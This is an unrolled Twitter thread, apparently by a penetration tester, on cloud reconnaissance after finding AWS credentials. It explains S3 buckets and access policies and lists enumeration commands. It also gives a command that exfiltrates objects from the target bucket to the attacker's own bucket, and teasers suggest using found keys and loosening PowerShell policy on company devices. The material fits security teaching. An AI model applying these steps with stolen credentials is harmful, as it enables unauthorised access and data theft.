Tweet

gatitohacs 😼

Mar 1 • 10 tweets • 4 min read

So you found #aws creds to an S3, lets do some #cloud #hacking #recon:

👇

First of all, S3 stands for serious summertime sadness
and allows the general operations of:

list
get
put
delete

An S3 is a bucket and within a bucket there are objects. Basically an object can be anyfile. Objects have keys assoziated

and a bucket nayme must be globally unique and not contain spaces or uppercase letters.
Example:
mrlee.s3.us-west-2.amazonaws.com/mafia/pizza.jpg

the bucket mrlee in the west region with an object pizza.jpg and a key of /mafia/pizza.jpg

So lets see what we can access with
aws s3 ls
aws s3api list-buckets
and then look at the objects of the example bucket (foqne in this case)

Okay lets look at access control. Its complicated. In prinziple access control can be ressource based,
via ACL or bucket pawlicy or attached to a bucket or individual object itself, or it can be linked to a user, or role, group, etc. respectivly

You can have a look at cloudcat on how to find these pawlicies and display them
github.com/rootcathacking…

Assume we have a bucket policy, to make it more readable you can pipe it and show a json.
Here it would mean that a specific IAM user has the permission to put objects in the bucket if the based check from the department is fullfilled - radical!

By enumerating all these policies, further excalation might be found (depending on the setup), maybe add your own files, change the ACL file itself, add a policy to a ressource etc

aws s3 sync might be useful, or it might be pawsible to exfil the bucket to your own s3, something like
aws s3 cp s3://mrlee/datpizza.jpg s3://mypizzanow/

@threadreaderapp

@threadreaderapp unroll

• • •

Missing some Tweet in this thread? You can try to force a refresh

This Thread may be Removed Anytime!

Twitter may remove this content at anytime! Save it as PDF for later use!

More from @rootcathacking

gatitohacs 😼

@rootcathacking

Mar 2

I pet a cat today and now my allergies are killing me, so obviously this calls for a follow up of, hey you found some #aws creds, what to do meow:

#cloud #hacking #Recon
👇

Step 1: First you gotta decide if this is more of a lazy space vibe kinda thing (A), or (B) calls for some illegal dirty acidcore and adjust your playlist accordingly:
A:
B: soundcloud.com/pitch1/i-can-h…

next drop the keys in your .aws creds file. I typically name the first set initial and work with the --profile tag in the cli, so I can keep track on were I am. Then check who you are first, with:
aws sts get-caller-identity --profile initial

Read 11 tweets

gatitohacs 😼

@rootcathacking

Feb 28

So you wanna do some #azure #recon:

I give you a few pointers.
👇

@DrAzureAD

Step 1: Say kiitos to @DrAzureAD then install AADInternals, set your phasers to stun and your POWAHSHELL to german to ensure MAXIMUM efficiency

To import the modul you might have to set your execution pawliciy 🐾.
For maximum fun we can set this to
Set-ExecutionPolicy unrestricted
on our managed company super safe devices. Do some privesc first if needed 😀

Read 9 tweets

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Share this page!

gatitohacs 😼

People who liked this thread also liked...

Try unrolling a thread yourself!

More from @rootcathacking

gatitohacs 😼

gatitohacs 😼

Did Thread Reader help you today?

Don't want to be a Premium member but still want to support us?

Send Email!